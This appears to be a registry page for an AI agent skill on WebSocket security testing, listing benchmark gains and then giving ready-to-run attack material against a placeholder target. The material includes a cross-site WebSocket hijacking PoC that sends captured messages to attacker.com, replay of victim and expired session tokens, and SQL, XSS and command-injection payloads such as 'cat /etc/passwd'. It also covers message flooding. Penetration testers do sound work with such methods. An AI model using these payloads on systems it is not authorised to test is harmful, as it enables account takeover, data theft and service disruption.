Loading skill
Install any skill in seconds. Free to start, no credit card required.
Get Started Free →WebSocket security testing — CSWSH, message injection, auth bypass, origin validation
| Test case | Without → With | Effect | Δ tokens | Δ turns |
|---|---|---|---|---|
| case-10 | ✗→✓ | ▲ Improved | 28% | 0% |
| case-16 | ✗→✓ | ▲ Improved | 15% | 0% |
| case-04 | ✓→✓ | = Same ✓ | 61% | 0% |
| case-05 | ✓→✓ | = Same ✓ | 65% | 0% |
| case-06 | ✓→✓ | = Same ✓ | 34% | 0% |
Exploit WebSocket implementation flaws including cross-site WebSocket hijacking (CSWSH), message injection, and authentication bypass.
bash# Look for WebSocket upgrade curl -s -D- https://TARGET/ -H "Upgrade: websocket" -H "Connection: Upgrade" # Check common paths for path in /ws /socket /websocket /api/ws /chat /live /realtime; do curl -s -D- "https://TARGET$path" \ -H "Upgrade: websocket" \ -H "Connection: Upgrade" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" 2>/dev/null | head -1 done
Check if Origin header is validated:
bash# Connect with evil origin websocat -H "Origin: https://evil.com" "wss://TARGET/ws" # If connection succeeds with evil.com origin → CSWSH is possible
PoC HTML:
html<script> var ws = new WebSocket('wss://TARGET/ws'); ws.onmessage = function(e) { fetch('https://attacker.com/log?data=' + btoa(e.data)); }; ws.onopen = function() { ws.send(JSON.stringify({action: 'get_profile'})); }; </script>
bash# Connect without auth token websocat "wss://TARGET/ws" # Test token reuse after logout websocat -H "Cookie: session=EXPIRED_TOKEN" "wss://TARGET/ws" # Connect with another user's token websocat -H "Cookie: session=VICTIM_TOKEN" "wss://TARGET/ws"
bash# Test for SQL injection via WebSocket message websocat "wss://TARGET/ws" <<< '{"action":"search","query":"test\" OR 1=1--"}' # XSS via WebSocket message (if rendered in other clients) websocat "wss://TARGET/ws" <<< '{"action":"chat","message":"<img src=x onerror=alert(1)>"}' # Command injection websocat "wss://TARGET/ws" <<< '{"action":"exec","cmd":"id; cat /etc/passwd"}'
bash# Rapid message sending for i in $(seq 1 1000); do echo '{"action":"ping"}' done | websocat "wss://TARGET/ws" # Large message python3 -c "print('{\"data\":\"' + 'A'*1000000 + '\"}')" | websocat "wss://TARGET/ws"
| Finding | Severity | |---------|----------| | CSWSH — cross-site WebSocket hijacking | High (P2) | | No authentication on WebSocket | High (P2) | | SQL/command injection via WS message | Critical (P1) | | Stored XSS via WS message | High (P2) | | Session not invalidated after logout | Medium (P3) |
websocat (external) — WebSocket CLI clientOther measured skills in the registry, with their headline benchmark lift.